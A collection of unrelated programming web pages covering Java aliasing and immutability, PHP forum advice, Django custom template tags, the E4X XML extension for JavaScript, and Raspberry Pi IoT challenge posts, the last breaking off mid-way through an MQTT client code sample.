Next we'll add general login and registration capabilities. This will continue the foundation by helping us figure out Authentication for the system, but it will also add some real data needs to our Cosmos DB so we can start identifying a good pattern for that persistence logic.
http://ugurak.net/index.php/2018/05/07/asp-net-core-2-w-cosmosdb-getting-started/
Section 8.6 References, Aliasing, and Immutable Objects

In Java, variables whose type is a class are always references to the corresponding object. Consider the following example:

public class Foo {
    int x;
    int y;

    public static void main(String[] args) {
        Foo a = new Foo();
        a.x = 3;
        // from here on, a and b alias
        Foo b = a;
        b.x = 5;
        System.out.println(a.x); // prints 5
        System.out.println(b.x); // prints 5
        // from here on, a and b no longer alias
        b = new Foo();
        b.x = 3;
        System.out.println(a.x); // prints 5
        System.out.println(b.x); // prints 3
    }
}

Figure: a and b from the example code in memory.

When, at some point in time, an object has two references \(a\) and \(b\) referring to it, we say that \(a\) and \(b\) alias (or that they are aliases). In the above example, a and b are aliases of the same object between the corresponding comments.

Subsection 8.6.1 Aliases

A benefit of using references is that they can be implemented with a compact memory footprint. The compiler typically translates them to an address in main memory, where the object's fields are located. For copying (as it also implicitly happens at a method call), only an address needs to be copied, rather than the entire object. However, multiple references to the same object at the same time can lead to program errors that are difficult to find. The problem is that mutating objects through aliases often opposes modularity: if we, for example, write a method that modifies an object \(O\text{,}\) a caller of the method needs to be aware of the fact that there may be other objects that refer to \(O\) and whether they can “handle” a potentially modified object. This awareness may require knowledge about other parts of the system and is therefore often not modular, because the program's correctness then depends on the correct interplay of multiple objects (of potentially different classes).

Subsection 8.6.2 Immutable Classes

One way to avoid errors caused by aliasing is to make classes immutable.
This ensures that the values of the object's fields cannot change after the object is constructed. Consequently, aliasing references cannot modify the objects anymore. Copying the reference to an immutable object is therefore conceptually equivalent to copying it by value. Java supports enforcing immutability with the keyword final:

public class Vec2 {
    private final double r, phi;

    public Vec2(double r, double phi) {
        this.r = r;
        this.phi = phi;
    }
    ...
}

final fields of a class must be assigned a value exactly once, in the constructor. The Java compiler rejects at compile time any code that would modify a final field of an object. This immutability is also enforced for the methods of the class itself, like the translate method in our example. For immutable classes, such a method needs to return a new, modified object instead of modifying the existing one:

public class Vec2 {
    ...
    public Vec2 translate(double dx, double dy) {
        return cartesian(getX() + dx, getY() + dy);
    }

    public static Vec2 cartesian(double x, double y) {
        double phi = Math.atan2(y, x);
        double r = Math.hypot(x, y); // robust even where Math.cos(phi) would be 0
        return new Vec2(r, phi);
    }
}

The method cartesian here serves the purpose of preparing the arguments for the constructor call, i.e., transforming the cartesian coordinates to polar coordinates. This method is marked with the static keyword. It therefore forgoes the implicit this parameter and can be called independently of a specific Vec2 object; the static method is merely declared in the namespace of Vec2. Such a static method that only creates new objects is also called a factory method.

Subsection 8.6.3 When to Use Immutable Classes?

Which classes should be made immutable and which should not needs to be decided on a case-by-case basis. Since we need to replicate instead of modify objects when we work with immutable classes, this can lead to allocating and initializing a large number of objects. Such operations cost time and memory.
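This replicate-instead-of-modify behavior is easy to see in a short, self-contained sketch. The class below mirrors the Vec2 API from above but stores cartesian coordinates directly, purely for brevity; it is an illustration, not the book's implementation.

```java
public class Vec2Demo {
    // A minimal immutable vector: all fields final, no setters.
    static final class Vec2 {
        private final double x, y;
        Vec2(double x, double y) { this.x = x; this.y = y; }
        double getX() { return x; }
        double getY() { return y; }
        // "Modification" allocates and returns a fresh object.
        Vec2 translate(double dx, double dy) { return new Vec2(x + dx, y + dy); }
    }

    // Returns the x coordinate of 'a' after calling translate on it:
    // the call cannot change 'a', so this is still the original value.
    static double xAfterTranslate() {
        Vec2 a = new Vec2(1.0, 2.0);
        Vec2 b = a;                     // aliasing an immutable object is harmless
        Vec2 c = a.translate(3.0, 0.0); // new object; a (and b) are untouched
        System.out.println(c.getX());   // 4.0
        return a.getX();
    }

    public static void main(String[] args) {
        System.out.println(xAfterTranslate()); // 1.0
    }
}
```

Every call to translate here allocates a new Vec2, which is exactly the cost this subsection weighs against the safety gained.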
A class Image that represents a graphical image is, for instance, not a likely candidate for immutability: assume the image has \(1000\times 1000\) pixels and every pixel requires four bytes. A single image then requires four megabytes of space. If we want to change a single pixel in such an image, it is a bad idea to copy the other \(999,999\) pixels just to create a new image.

The following summarizes the advantages and disadvantages of immutable vs mutable objects:

- Immutable objects: safe to share, since aliasing references cannot modify them; the cost is that every "modification" allocates a new object, which takes time and memory.
- Mutable objects: efficient in-place modification; the risk is that changes through aliases can cause errors that are hard to find.

Remark 8.6.2. Many important classes in Java are immutable and use tricky implementations to reduce the inefficiency introduced by copying objects. A prominent example is String.
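The String case from the remark can be checked directly: String methods never modify the receiver; they return new objects instead.

```java
public class StringDemo {
    // Calling a "modifying" method on a String leaves the original intact.
    static boolean originalUnchanged() {
        String s = "immutable";
        String t = s.toUpperCase(); // returns a NEW String
        System.out.println(t);      // IMMUTABLE
        return s.equals("immutable");
    }

    public static void main(String[] args) {
        System.out.println(originalUnchanged()); // true
    }
}
```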
https://prog2.de/book/sec-java-immutable.html
trq (Staff Alumni)
- Content count: 30,999
- Days Won: 26
- Community Reputation: 255 (Excellent)

About trq
- Rank: Prolific Member
- Birthday: 06/12/1975

Profile Information
- Gender: Male

how to make my website fast ?
trq replied to yhi's topic in Other
The simplest way to gain request-start to request-end speed is to cache using something like Akamai.

namespace autoloader for custom api
trq replied to rwhite35's topic in Application Design
Composer ships with an autoloader; just stick to one of the standards and use that.

PHP developer section
trq replied to spencer9772's topic in Application Design
like wtf?

- The point I'm trying to make is: why have the rewrite at all if you're just going to use normal query string parameters? I understand you want to force everything through a front controller, but why stop there? But yeah, you could just use the QSA flag to have Apache append existing parameters. RewriteRule ^(.*)$ index.php?uri=$1 [PT,L,QSA]
- That rewrite rule removes the need for typical GET parameters by making your URLs "pretty". So instead of this: users/activate-account?email_address=test&token=test you would use something more like: users/activate-account/test/test Of course then you need some sort of "router" to parse and handle these parameters for you. If this is your own framework, you need to decide how your URLs are going to be formed.

Alternatives to $_GLOBALS
trq replied to NotionCommotion's topic in PHP Coding Help
Why? The only reason to do this is laziness. It makes your code tightly coupled to whatever this "god" object is. A controller has no interest in your connection settings, for instance. Objects should be passed their dependencies (and only their dependencies) at construction time. Most frameworks handle this in an easy-to-manage manner by providing a configurable dependency injection container which allows you to configure how objects are to be created.

Rookie needs help - filtering path?
trq replied to HansDampfHH's topic in Regex Help
You don't need a regex unless you actually need to match a pattern.
<?php if (substr_count($path, '/') > 2) { echo "Directories too deep"; }

Cronjob and insert content in site
trq replied to vinsb's topic in PHP Coding Help
Why would you edit the index.php file? PHP is a programming language; you can use it to dynamically display data from different data sources. Having cron dynamically alter the PHP "script" is ridiculous. Instead, have your cron job put the data somewhere PHP can easily access it (like a database) and then write some logic into your PHP script to retrieve this data and display it.

Efficient portable PHP development environment?
trq replied to Abuda's topic in PHP Installation and Configuration
Define "portable".

Where is anti-formatting performed?
trq replied to NotionCommotion's topic in PHP Coding Help
There should be zero business logic in controllers. They are nothing but a very thin layer between HTTP and your domain.

Storing articles on GitHub
trq replied to Stefany93's topic in Miscellaneous
Yes, they will be indexed by Google.

Does anyone know about this error?
trq replied to eramge11's topic in PHP Coding Help
That is not a standard PHP error. Both CDbException and CDbCommand are part of your code base.

Mods4u
trq replied to eggbid's topic in Miscellaneous
What?

Detecting Mobile Handset Script
trq replied to Jetheat's topic in Third Party Scripts
Why would you care what mobile a client is using?

Making configuration changes in Joomla
trq replied to Season's topic in PHP Installation and Configuration
There is no need to restart the machine, just the HTTP server: sudo /etc/init.d/nginx restart
https://forums.phpfreaks.com/profile/19189-trq/
Tutorial for: Django.

As you may know, all the actual content on this website, including this tutorial, is built using a Django template. The template for this tutorial is stored in a database table and rendered out when it is displayed. Of course, I cache the result to limit the number of times the database is queried. I will talk about caching in templates in my next tutorial; this one will focus on how to customize the template engine for your particular requirements. Depending on what type of web application you are creating, you may use templates to embed snippets of HTML from another file with a special context, use a tag to grab some extra data about an object from the database for the user, or perhaps use it to render special forms in specific places on your website. Whatever your web application may be, it will more than likely make your task a lot easier if you create tags for the most-used components on the site.

Here is a very simple mock template of a base page: essentially what this blog's base page is, without all the extra formatting. I separated each component of the site into different files to more easily edit them when I need to. Since they are static data which rarely ever changes, it's safe to put them into separate HTML files.

<html>
<head>
    <title>Python Diary | {% block title %}{{title|default:"Untitled page"}}{% endblock %}</title>
</head>
<body>
    {% include "site-nav.html" %}
    ....
    {% block body %}
    {% endblock %}
    ....
    {% include "aboutme.html" %}
    {% include "tags.html" %}
    {% include "archive.html" %}
</body>
</html>

Pretty straightforward? You will notice the title section is able to take a title from either a subclassed block or a context variable. I know sub-templates are not subclassed templates, but that's how I like to picture them, as in essence that's really how an extended template works. Here is a very simple entry template:

{% extends "base.html" %}
{% block body %}
....
{% endblock %}

A better method of building your base template would be to add blocks in the head section, so that you can easily add new CSS or JavaScript blocks. This is extremely helpful for dynamic websites which use a lot of complex styling or jQuery functions.

Now let's talk about template tags, and how to build a custom one with a useful purpose. The first thing you should ask yourself: can I add a new method to my model to do the same function? I ask because adding a new method to a model is much more transparent and object-oriented. Here is a very simple template which uses the most widely used model function in Django:

<a href="{{article.get_absolute_url}}">{{article}}</a>

Remember that all get_absolute_url is, is a model class method. Interestingly enough, all of a model class's methods can be accessed from a Django template. The template system's main purpose is to access the fields of the model rather than the methods; accessing the methods is a most welcome side-effect that proves very useful when building applications. Let's create an Article model, and I will show you what else can be performed using its methods in templates.

class Article(models.Model):
    title = models.CharField(max_length=80)
    slug = models.SlugField()
    content = models.TextField()
    published_on = models.DateTimeField()
    author = models.ForeignKey(User)
    categories = models.ManyToManyField(Category)

    @models.permalink
    def get_absolute_url(self):
        return ('view-article', [self.slug])

    @models.permalink
    def get_author_url(self):
        return ('view-author', [self.author.username])

This is a simple example which only generates URLs for the template or any other part of your application to use. A method can also do calculations, or return a True/False value which can be used in the template system's if block. An example of a calculation would be a billing system, where it can tally up the price of all services on an invoice and add taxes.
This data doesn't need to be stored in the database, as it can be calculated at runtime when needed. Here is a simple Invoice model:

class Invoice(models.Model):
    customer = models.ForeignKey(User)
    services = models.ManyToManyField(Service)

    def total(self):
        result = Decimal('0.00')
        for service in self.services.all():
            result += service.cost
        return result * Decimal('1.14')

A template can easily place invoice.total, even though it is not a field in the database but rather a method on the model. (Note that the tax factor is a Decimal here: multiplying a Decimal by the float 1.14 would raise a TypeError.) You can add most of the model's business logic directly in the model itself. This method can also be used anywhere in the application, for when you actually send the total to your credit card processor for payment. This example is very simple and more than likely needs more fields to actually work in a real-world scenario.

Okay, now that we got that out of the way, let me explain how to add new template tags, which can easily extend what the Django template engine can do. Something you may wish to have in a template tag is an easy way to render a form which is used in various sections of the site, but not everywhere. The Django comments framework uses a similar template tag to render the comments form.

from django import template
from forms import SimpleForm

register = template.Library()

@register.inclusion_tag("simple_form.html")
def simpleform():
    return {'form': SimpleForm()}

This will essentially render a form wherever you place the tag simpleform in your template. Follow the Django documentation for how to create the template library and how to load it into a template. This next example will take something I do on this blog a lot: create links to packages from inside my templates. You should notice links like Django all over this website.
Here is how it's done:

from django import template
from pkglist.models import Package

register = template.Library()

@register.simple_tag
def package(slug):
    pkg = Package.objects.get(slug=slug)
    return '<a href="%s">%s</a><a href="%s" rel="tooltip" title="Direct link"><i class="icon-bookmark"></i></a>' % (pkg.get_absolute_url(), pkg, pkg.website)

I use caching on the actual template to make sure each lookup in the database is kept to a minimum. Also, there is no checking done here to see if the package exists; I left this out for simplicity. Here is a template tag which I used in a few of my tutorials, which may help others out there who are building Django sites with YouTube functionality:

@register.simple_tag
def youtube(slug):
    return '<iframe width="420" height="315" src="https://www.youtube.com/embed/%s" frameborder="0" allowfullscreen></iframe>' % slug

This can also be done using an inclusion tag. I will not dive into complex template tags in this tutorial, meaning ones which do not use the shortcuts. This YouTube example is a great example of how powerful the template system can be if you just think of common tasks you normally perform and want to simplify their inclusion. One could also make this YouTube tag fetch metadata from a database to be displayed as well.

This ends the template tutorial for now. My next tutorial in this set will focus on urls.py and templates, and how to make every component in Django work together well to ease the development process. You really should never hardcode URLs into your templates, and my next tutorial will go through all the ways of properly adding URLs in templates for various purposes.
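Stripped of Django's registration machinery, a tag like youtube above is just string interpolation, which makes it trivial to unit-test in isolation. A plain-Python sketch (the embed URL here is the standard YouTube one, filled in as an assumption since it is not part of the excerpt above):

```python
def youtube(slug):
    """Render a YouTube embed iframe for the given video slug, as the template tag would."""
    return ('<iframe width="420" height="315" '
            'src="https://www.youtube.com/embed/%s" '
            'frameborder="0" allowfullscreen></iframe>' % slug)

# The tag body is pure, so it can be exercised without a template context:
print(youtube("abc123"))
```

Keeping the body a pure function like this is what makes simple_tag-style helpers easy to test; the @register.simple_tag decorator only adds the template plumbing.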
http://pythondiary.com/tutorials/making-django-templates-work-you.html
Introducing E4X
November 30, 2007

Assigning to E4X Objects

One of the coolest aspects of E4X is the power exposed by assignments. Indeed, you can use assignment to quickly build XML structures from scratch, change values on the fly, and add and remove new content quickly. Consider, for instance, the nascent phone book discussed here. The following shows how you can create a new phone book with a single entry:

var phoneBook = <phoneBook/>;
phoneBook.phoneEntry = new XMLList();
var phoneEntry = <phoneEntry/>;
phoneEntry.name = "Jeane Tomasic";
phoneEntry.phoneNumber = "123-4567";
phoneBook.phoneEntry += phoneEntry;
print(phoneBook);
=>
<phoneBook>
  <phoneEntry>
    <name>Jeane Tomasic</name>
    <phoneNumber>123-4567</phoneNumber>
  </phoneEntry>
</phoneBook>

The second statement, phoneBook.phoneEntry = new XMLList();, indicates that any time phoneBook.phoneEntry is used as an L-value (is on the left side of an assignment statement) it should be treated as a list (for reasons to be covered momentarily). The next three lines create an individual entry. When an XML() object has a new name (such as .name or .phoneNumber) appended to it, that name will be treated as a new element with that name, holding the value calculated from the right side of the equation. This is similar to the way that objects (as hashes) work, but in the case of objects, what are created are hash keys and values rather than elements and text children, as is the case for E4X.

The statement phoneBook.phoneEntry += phoneEntry is, frankly, just cool. It adds the newly created phoneEntry object to the phoneEntry list. Note that the element name of the added object MUST correspond to the name of the list, or this throws an exception. However, in some cases you may have multiple types of items being added to a given element. In this case you can use a wild card character as the list name, with no need to declare the entity.
var html = <html/>;
html.head.title = "A new XML Document";
html.head.style = <style><![CDATA[
h1 {font-weight:bold;}
]]></style>;
html.body.* = new XMLList();
html.body.h1 = <h1>A new XML Document</h1>;
html.body.* += <p>This is the first paragraph.</p>;
html.body.* += <p>This is the second paragraph.</p>;
html.body.* += <ul/>;
html.body.ul.* += <li>This is item 1</li>;
html.body.ul.* += <li>This is item 2</li>;
print(html);
=>
<html>
  <head>
    <title>A new XML Document</title>
    <style>
      h1 {font-weight:bold;}
    </style>
  </head>
  <body>
    <h1>A new XML Document</h1>
    <p>This is the first paragraph.</p>
    <p>This is the second paragraph.</p>
    <ul>
      <li>This is item 1</li>
      <li>This is item 2</li>
    </ul>
  </body>
</html>

This sequence makes a quick web page, doing a few rather subtle tricks to do so. The first is the implicit creation of nodes; the statement html.head.title = "A new XML Document" first checks to see if a <head> element is defined. Since one isn't, the E4X core automatically creates it before making the <title> child element to it. In the next statement, a CDATA block is used to add content that will not be parsed (avoiding the parsing of the CSS rule contained within the <style> element). The statement html.body.* = new XMLList(); tells the E4X object that if new items are added to the * object (a wild card) these should be assumed to be added as a child to the list contained by the <body> element. This can be overridden explicitly (the <h1> statement does just this), but normally when objects are added via the += operator, they will then be added to the list in the order assigned. Thus, html.body.* += <p>This is the first paragraph.</p> adds a new paragraph to the body, the next statement adds a second paragraph to the body and so forth. The <ul> statement represents this same principle in miniature, and shows how you can add pieces to a larger structure without having to carry around the reference node.

The benefit of this approach is somewhat limited if you're just building an XML or XHTML structure - it's probably more efficient to just use a regular XML editor. However, this approach can come into its own when you're trying to combine XML and JavaScript. For instance, suppose that you had an object version of the phone book and you wanted to create a table showing the names and numbers of each person in the book.
You can combine the above approach with JSON iteration to quickly create the table:

var _phoneBook = {phoneEntry:[
    {name:"Joe Schwartz",phoneNumber:"342-2351"},
    {name:"Aleria Delamare",phoneNumber:"342-7721"},
    {name:"Susan Sto Helit",phoneNumber:"315-2987"},
    {name:"Kyle Martin",phoneNumber:"342-7219"}
]};
var table = <table/>;
table.tr = new XMLList();
table.tr.th = new XMLList();
table.tr.th += <th>Name</th>;
table.tr.th += <th>Phone Number</th>;
for each (var entry in _phoneBook.phoneEntry){
    table.tr += <tr>
        <td>{entry.name}</td>
        <td>{entry.phoneNumber}</td>
    </tr>
}
print(table);
=>
<table>
  <tr>
    <th>Name</th>
    <th>Phone Number</th>
  </tr>
  <tr>
    <td>Joe Schwartz</td>
    <td>342-2351</td>
  </tr>
  <tr>
    <td>Aleria Delamare</td>
    <td>342-7721</td>
  </tr>
  <tr>
    <td>Susan Sto Helit</td>
    <td>315-2987</td>
  </tr>
  <tr>
    <td>Kyle Martin</td>
    <td>342-7219</td>
  </tr>
</table>

Once created, the table can then be added into an existing element via the innerHTML property. It's also possible to remove an item from an existing E4X object via the delete command. For instance, to remove the third item (Susan Sto Helit) from the table you just created, you simply use the command:

delete table.tr[3]

though a warning here is in order: unlike other XML technologies such as XPath, E4X is zero based, so that table.tr[3] is actually the fourth row in the table, but the first row is the header, bumping the index up one. If you wanted to exclude the header row, you'd use table.tr.(td)[3], as discussed below.

Iterations and Filters

This use of iterating through an object represents another area where E4X equalizes the field. One advantage that JSON has over DOM is the fact that iterations in JSON are very straightforward, while they are cumbersome and awkward in DOM. However, E4X was designed specifically with iterations in mind, and in some respects is considerably more efficient than JSON in that regard.
For instance, suppose that you wanted to look through a set of phone numbers to find the ones that are in the "342" local exchange (the first three numbers of the seven-digit version of the telephone number). Both JSON and E4X would render this as:

for each (phoneNumber in phoneNumbers.phoneNumber){
    if (phoneNumber.indexOf("342")==0){print(phoneNumber);}
}

However, suppose that you had a more complex structure, of the form:

phonebook
    phone-entry
        name
        phone-number

In XML this might be an instance of the following:

<phoneBook>
  <phoneEntry>
    <name>Joe Schwartz</name>
    <phoneNumber>342-2351</phoneNumber>
  </phoneEntry>
  ...
</phoneBook>

while as an object, this same list would be given as:

{ phoneEntry:[
    { name:"Joe Schwartz", phoneNumber:"342-2351" },
    { name:"Aleria Delamare", phoneNumber:"342-7721" },
    { name:"Susan Sto Helit", phoneNumber:"315-2987" },
    { name:"Kyle Martin", phoneNumber:"342-7219" }
]}

To retrieve a list of all of the phone entries for a given exchange, the E4X version would be given as:

for each (entry in phoneBook.phoneEntry.(phoneNumber.indexOf("342")==0)){
    print(entry.name+":"+entry.phoneNumber);
}

while the equivalent object-based version becomes:

for each(entry in _phoneBook.phoneEntry){
    if (entry.phoneNumber.indexOf("342")==0){
        print(entry.name+":"+entry.phoneNumber);
    }
}

This subtle difference can add up when you're dealing with dozens or hundreds of entries, as the E4X version is performed as a binary filtering, whereas the pure object equivalent is handled as a script call. The more complex the conditional filter(s), the more the advantage shows up in favor of E4X.
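The object-based half of this comparison runs in any JavaScript engine (the E4X half needs an E4X-capable host such as the Spidermonkey of that era); here it is as a self-contained snippet over the same data, with the filter pulled into a reusable function:

```javascript
// Plain-object phone book, matching the JSON examples above.
var _phoneBook = { phoneEntry: [
    { name: "Joe Schwartz",    phoneNumber: "342-2351" },
    { name: "Aleria Delamare", phoneNumber: "342-7721" },
    { name: "Susan Sto Helit", phoneNumber: "315-2987" },
    { name: "Kyle Martin",     phoneNumber: "342-7219" }
]};

// Collect the entries whose number starts with the given exchange.
function entriesForExchange(book, exchange) {
    var result = [];
    for (var i = 0; i < book.phoneEntry.length; i++) {
        var entry = book.phoneEntry[i];
        if (entry.phoneNumber.indexOf(exchange) === 0) {
            result.push(entry);
        }
    }
    return result;
}

var matches = entriesForExchange(_phoneBook, "342");
matches.forEach(function (e) {
    console.log(e.name + ":" + e.phoneNumber);
});
```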
Additionally, because E4X is a set-based language, the above can be rendered as:

var entries = phoneBook.phoneEntry.(phoneNumber.indexOf("342")==0);
for each (entry in entries){
    print(entry.name+":"+entry.phoneNumber);
}

To do this in object-based JavaScript requires that you create a list and populate it:

var _entries = [];
for each (var entry in _phoneBook.phoneEntry){
    if (entry.phoneNumber.indexOf("342")==0){
        _entries.push(entry);
    }
}
for each (entry in _entries){
    print(entry.name+":"+entry.phoneNumber);
}

giving you four lines vs. nine. Other than the rather annoying inability for an element to reference itself in a filter (the part contained in an expression such as the following, shown in bold):

phoneBook.phoneEntry.(phoneNumber.indexOf("342")==0)

the E4X code for filtering (using JavaScript expressions relative to a given context) is generally considerably more intuitive and usually terser than the equivalent expressions with JavaScript objects.

Building a Feed Application with E4X

Perhaps one of the biggest benefits of using E4X stems from the fact that most database systems (and consequently many web sites) are now moving towards producing XML content natively, whereas relatively few are doing the same thing with JSON feeds (which consequently need to be crafted by hand). Consider, for instance, the process of retrieving an XML-based Atom feed from my blog to retrieve the titles of each entry in the feed and place them as options in a select box, as shown in Listing 1.

Listing 1.
Showing Metaphorical Web Atom Feeds

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<script type="application/x-javascript"><![CDATA[
var populate = function(selectId, displayId, linkId, feed){
    var http = new XMLHttpRequest();
    ...
}
]]></script>
<style type="text/css"><![CDATA[
#display {width:600px;height:400px;overflow-y:auto;
    border:solid 2px gray;padding:5px;-moz-border-radius:8px;
    background-color:#ffef80;}
h1 {font-size:18pt;font-family:Times New Roman;}
h2 {font-size:14pt;font-family:Times New Roman;font-style:italic;}
]]></style>
</head>
<body onload="populate('s1','display','link','')">
<h1>Metaphorical Web</h1>
Article: <select id="s1"/>
<a href="" id="link" target="new">Open</a>
<br/>
<div id="display">Select an article to review.</div>
</body>
</html>

This particular function relies upon a server "router" for passing feeds: in this case a short eXist database XQuery called feed.xq, called as a web service, which takes the URI passed as part of a "path" parameter and retrieves the document associated with it:

(: feed.xq :)
declare namespace atom="http://www.w3.org/2005/Atom";
declare namespace h="http://www.w3.org/1999/xhtml";

let $path := request:get-parameter("path","")
let $doc := httpclient:get(xs:anyURI($path),false(),<headers/>)
return $doc

This exercise is also making the implicit assumption that the syndication feed is in Atom format, though the same basic rules apply for most XML-compliant RSS 2.0 feeds. In this particular example, when the document initially loads, it asynchronously retrieves the Atom feed from the server via the populate() function using an XMLHttpRequest call. The goal here is to minimize the amount of processing of the feed as a DOM, so here that process is handled by using the http.responseText method to get the feed as text. The Mozilla E4X implementation has a few serious limitations, one of the biggest of which is its inability to parse XML declarations that start with <? and end with ?>.
Thus, it is necessary to run a quick regular expression to remove all of these:

var data = data.replace(/<\?(.*?)\?>/g,"");

Namespaces in E4X are something of a headache, for much the same reason that they are a headache in XML in general. However, it is possible to change the default namespace and work within the context of that namespace without needing to create a formal namespace declaration or use prefixes. In order to retrieve the feeds from the relevant returned document (which includes various HTTP request and response headers as part of the package), the default namespace was set to the Atom namespace, "http://www.w3.org/2005/Atom":

default xml namespace="http://www.w3.org/2005/Atom";
var feed = new XML(data);

Once so declared, it becomes possible to switch back and forth between the Atom namespace and the XHTML namespace, jumping from reading data appropriate to each entry to making new option elements for that entry:

for each (entry in feed..entry){
    default xml namespace="http://www.w3.org/2005/Atom";
    var title = entry.title.toString();
    var id = entry.id;
    default xml namespace="http://www.w3.org/1999/xhtml";
    var option = <option value={id}>{title}</option>.toXMLString();
    selectNode.innerHTML += option;
}

Note the use of the toString() and toXMLString() methods. E4X exposes a limited set of methods on E4X XML() and XMLList() objects (you don't have the same ability to assign methods to E4X objects that you do with ordinary objects, for this reason). A reference such as entry.title actually returns an XML node; if this is used as part of a string expression then the JavaScript engine will automatically recast the node to its text value, but sometimes it is better to make this explicit via the toString() method (you could also do ""+entry.title to do the casting, but that operation isn't always obvious when looking at code). Similarly, the toXMLString() method will serialize an XML() node as XML content, while applying toXMLString() to an XMLList() object will return a serialized collection of nodes.
The mapping to the default namespace prior to the option will set the namespace to the namespace of the containing object, which in this case is the <select> node, if passed to the innerHTML property. One of the more useful aspects of JavaScript as a language is the use of closures, in which variables that are defined at one point, then used within a function defined in the context of those variables, will continue to hold the values previously assigned so long as the function remains in scope. This is used to good effect in the internally defined selectFeed() function. The feed is referenced within the function, as well as displayNode and linkNode, which define the display area for a selected entry's content and a button for launching the original page in a second window. One interesting consequence of this is that because the selectFeed() function is then assigned at that point to the selection box listing the titles, the feed itself remains in memory, but is completely inaccessible to anything beyond the selectFeed() function. Admittedly, in this case it doesn't make that much difference (determining the feed is relatively simple), but from a security standpoint this provides a layer of protection on potentially sensitive information.

I wanted to include the link to the source not only because it's a logical piece of a feed viewer, but because it's useful to illustrate an attribute filter in E4X. In Atom, a given entry may have more than one link associated with that entry. The rel="alternate" link is typically the one that contains a reference to the relevant web page that the resource came from initially (and as such there is always only one such alternate link). The expression entry.link.(@rel=='alternate').@href thus retrieves from the link collection the link for which the @rel (relationship) attribute is set to "alternate".
The expression within the parentheses here is (more or less) JavaScript; the @rel retrieves the rel attribute relative to the link collection and compares it to the string 'alternate' (note the double equal signs). This is a filter, just as var entry = feed..entry.(id==selectNode.value); in the previous line is a filter. A screenshot of the "app" is shown in Figure 1.

Figure 1. Metaweb Screenshot

At the end of this method you have the expression linkNode.setAttribute("href",link). This is a DOM statement, because linkNode is a DOM element, not an E4X element. At this stage, while one of the main goals of the E4X process was to create a simpler, more efficient way of working with document objects, this has not been realized in any significant way. By the way, it is possible to convert an E4X object into a DOM tree and vice versa, though these are comparatively expensive operations. The function eNode2dNode performs the conversion one way, converting an E4X object into the root node of its own DOM-based document, while dNode2eNode makes the conversion in the other direction:

var eNode2dNode = function(eNode){
    var str = eNode.toXMLString();
    var doc = (new DOMParser()).parseFromString(str,"text/xml");
    return doc.documentElement.cloneNode(true);
}

var dNode2eNode = function(dNode){
    var str = (new XMLSerializer()).serializeToString(dNode);
    var eNode = new XML(str);
    return eNode;
}

E4X and JSON

It is not my wish to deprecate the importance or value of JSON in this article (well, not much anyway). JSON represents a minimally sufficient platform for information interchange within most browsers, and as such realistically will be around for quite some time (especially as Microsoft's Internet Explorer does not look like it will be adopting the most recent JavaScript changes any time soon). However, it's worth noting that a lightweight XML protocol, LINQ, likely will be migrating to IE with its next release.
While differing somewhat in syntax from E4X (and having a considerably broader role), LINQ will most likely be doing much the same duty in IE that E4X does in Firefox and Flash—providing a way of using XML easily and cleanly without having to use the rather cumbersome mechanism of DOM. Given the increasing dominance of XML as a messaging and transport protocol on the server and between server and client, the use of LINQ does open up the notion that you can take advantage of the rich characteristics that XML has to offer without having to complexify your code with DOM manipulation. At a minimum, if you are specifically targeting the frameworks where E4X is supported, you should take some time to investigate the technology, especially when dealing with the increasingly syndicated nature of web technologies. Combining E4X and Atom, for instance, opens up all kinds of interesting potential usages, especially given the increasing role that Atom is playing as a data transport protocol for companies such as Google. While it is possible that you'll see more companies exposing JSON services, I personally see XML-based Atom services growing far faster, and in that case the use of a native XML datatype just cannot be beat. Kurt Cagle is an author, research analyst with Burton Group, technology evangelist, information architect, and software developer specializing in web technologies. He is the webmaster for XForms.org. He lives in Victoria, British Columbia, where he's working on the open source x2o data server.
http://www.xml.com/pub/a/2007/11/28/introducing-e4x.html
This is an index page providing links to every post created as part of the Pi IoT Design Challenge for the Alarm Clock / Control Unit project. Enjoy! This PiIoT Challenge evolved in a very strange way for me: the more the project grew, the more a new scenario emerged and imposed itself as the main track. So what happened? I had to make a choice: close the challenge just in time, or smoothly follow the project's evolution. There was no time to do both. Closing the challenge by the deadline would have required a series of simplifications in the project, and the remaining time before the next (and, why not, more ambitious) deadline was too short for refactoring the idea and prototype toward the new target. I made my choice: the challenge deadline became just the most important part of a wider project focused on a more complex design. It was clear to me that this was a necessary choice, seeing the first media coverage and, most of all, the interest and support from the other partner, the MuZIEum, where the project will take place; the same Element14 supporting and encouraging me; the approach of the second sponsor, GearBest.com; and the first interviews being published over the next weeks. The new timeline necessarily changed the project approach. This perfect reading place became focused on Internet of Things technologies supporting visually impaired users: it will be a real reading, chatting, discussing, and interacting area to be installed at the MuZIEum site. Many new aspects to take care of made things more complex, but also more interesting. The design idea becomes a use case, adding one more level of complexity: usage, color choices, networking, usability, and more. The points below focus on the main aspects: During this period a series of video podcasts with Periscope are planned for streaming on Twitter, covering project news, interviews with staff members, and more. The project updates will continue as usual from the next 5 September.
I hope that element14Dave, spannerspencer and the rest of the Element14 challenge sponsors will appreciate the scenario. And I also hope that users continue following the project's development status. Most of the code is available on GitHub. Even though technically both nodes are working, they are too simplistic! I want something that will actually be used in the house and is even appealing to my roommates. Which means that: Always key in a smart house, and yet I left it for the very end... till it was too late. That's been all for now. Greetings! Caterina Lazaro. Last day (+1) of the Pi IoT competition, and a Smart Competition Home is ready to run. In this post, I wanted to show what the system looks like: both on paper and in the house itself. So here come the pictures: ELEMENTS/NODES: PUBLIC DOMAIN I want to show where each node is working in real life. Installation is a very kind word to use in this case, as each node has been located on a best-effort basis (but it works!) Attached to the back door in the Kitchen. In the corner of the living room: accessible and not in the way. The User's Node is intended to be each of our smartphones. However, I also had an old tablet which was only used to control Netflix on the home Chromecast. Well... it is now a general User's Node to read the smart house information. This new post finalizes the User Node (an Android device). It will add the smart-house functionalities to those of the competition system. This way, any resident will be able to check the smart house information while connected to the WiFi, and switch to Competition mode when leaving to gain some miles. *In other words... I will make the Smart Competition button work. NOT CONNECTED EXAMPLES OF SUBSCRIBE RESPONSE Initial setup: Nexus 5 / Android / SmartCompetitionHome App v3. It is a direct implementation of the MQTT clients, thanks to the Paho library: I create both kinds of clients in the app.
To do so, the code needs: Both types of client (subscriber, with its callbacks, and publisher) are implemented in the Paho libraries. Great news!

public static void createMQTTDefaultClients(){
    String url = protocol + broker + ":" + port;
    clientId = "phone_" + action;
    try {
        // Publisher: create an instance of this class
        sampleClient = new MyCustomMqttClient(url, clientId, cleanSession,
                quietMode, userName, password);
        // Perform the requested action
        sampleClient.publish(pubTopic, qos, message.getBytes());

        // Subscriber (async)
        clientId = "phone_" + action_async;
